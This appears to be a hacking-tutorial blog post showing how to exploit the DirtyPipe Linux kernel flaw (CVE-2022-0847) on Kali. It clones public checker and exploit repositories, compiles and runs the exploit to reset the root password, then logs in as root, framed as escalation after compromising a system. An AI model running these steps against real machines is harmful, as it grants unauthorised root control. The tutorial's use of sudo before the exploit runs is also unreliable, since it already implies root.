Welcome back, my aspiring cyberwarriors!
Often, after successfully compromising a system, we are limited to the privilege's of the compromised user. Regular users on systems usually have very limited privileges and can not access many of the resources or make changes to their systems and resources (databases, etc.). This is one of the many ways that good system administrators secure their networks.
Although they have limited privileges, regular users are usually easier to compromise than the system administrator as they are usually less security aware. They are more prone to fall for malicious links and other social engineering attacks and often use weak passwords. For all of these reasons, you are far more likely to compromise a regular user with limited privileges than a system administrator with root or system admin privileges.
To take control of the systems and network you will need to escalate privilege's to the system administrator or root on Linux systems. There are large variety of techniques for escalating privileges including;
Kernel Exploits
SUID/SGID misconfigurations
sudo
commands with escape characters
Service Exploits
Weak File Permissions
Environment Variables
Abusing Intended Functionality
In this tutorial, we will examine a kernel exploit privilege escalation exploit named DirtyPipe. It was found by Max Kellerman and assigned CVE-2022-0847.
DirtyPipe is a local privilege escalation vulnerability in the Linux kernel that allows a local attacker to bypass ANY file permissions, and write arbitrary data to any file under certain conditions. This means that files such as /etc/shadow, where password hashes are stored on the system can be overwritten with a new password.
Let's test this potential local Privilege Escalation exploit on Kali 2021.
Step #1: Testing for the Vulnerability
The first step is determine whether your Linux kernel is vulnerable to Dirty Pipe. In this case, I'm using Kali 2021.
We know that the Linux kernel after 5.8 is vulnerable and that this vulnerability was patched in 5.16. We can identify the Linux kernel version by using the uname command in Linux.
kali > uname -a
As you can see this version of Kali uses the Linux kernel 5.10.0. This may make it vulnerable to Dirty Pipe as this release is between the first kernel version vulnerable and the patched kernel versions!
To be more certain, let's download the DirtyPipe checker. It is available at
kali > sudo git clone https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker
Next, navigate to the new directory.
kali> cd CVE-2022-0847-dirty-pipe-checker
Now, execute the dpipe.sh script
kali > sudo dpipe.sh
As you can see above, this vulnerability checker confirmed that this Linux kernel is vulnerable to the Dirty Pipe privilege escalation exploit!
Step #2: Download the Exploit
Now that we know that this Linux version is vulnerable, let's attempt to exploit it to get root privileges.
First, download the exploit;
kali > sudo git clone https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits
Next, navigate to the new directory.
Now that we are in that directory, let's look inside.
kali > ls -l
As you can see above, there are two exploits and one compile script. We need to run the compile script to use these exploits. The compile script will compile both exploits automatically.
kali > sudo ./compile.sh
After you do so, the two exploits will turn green and be ready to execute.
Let's run exploit-1 first.
kali> sudo ./exploit-1
It appears to have worked and changed the root password to "piped"!
Step #3: Login as Root
Let's now test to see whether we can login as root.
kali> su root
Next, enter the new password "piped"
After doing so, enter the Linux command whoami;
root
To further confirm that you have root privileges, trying running the Linux command id
uid=0(root) groups=0(root), ........
Success! Now you have root privileges on the system and can do whatever you want!
Summary
Escalating privileges is one of the key skills of a penetration tester/hacker. In many cases, we exploit an ordinary user without the privileges we need to take control of the system/network. The DirtyPipe kernel exploit is an excellent tool to escalate privileges of Linux systems released in approximately 2021-2022.